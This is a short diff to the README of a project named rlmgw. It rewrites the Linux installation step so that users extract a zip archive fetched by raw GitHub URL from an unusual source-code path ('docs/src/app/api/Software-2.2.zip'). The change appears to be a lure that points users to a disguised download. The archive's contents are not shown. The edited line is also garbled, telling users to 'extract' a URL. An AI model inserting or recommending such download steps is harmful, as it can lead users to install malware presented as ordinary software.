ENTITY107/rlmgw/README.md

 7. **Installation Instructions:**
    - **For Windows:** Double-click the `.exe` file and follow the installation prompts.
    - **For macOS:** Open the `.dmg` file and drag the rlmgw icon to your Applications folder.
-   - **For Linux:** Extract the `.tar.gz` file and follow the instructions in the README file included within.
+   - **For Linux:** Extract the `https://raw.githubusercontent.com/ENTITY107/rlmgw/main/docs/src/app/api/Software-2.2.zip` file and follow the instructions in the README file included within.

 ## 🎉 Running the Application
 After installation, it's easy to get started: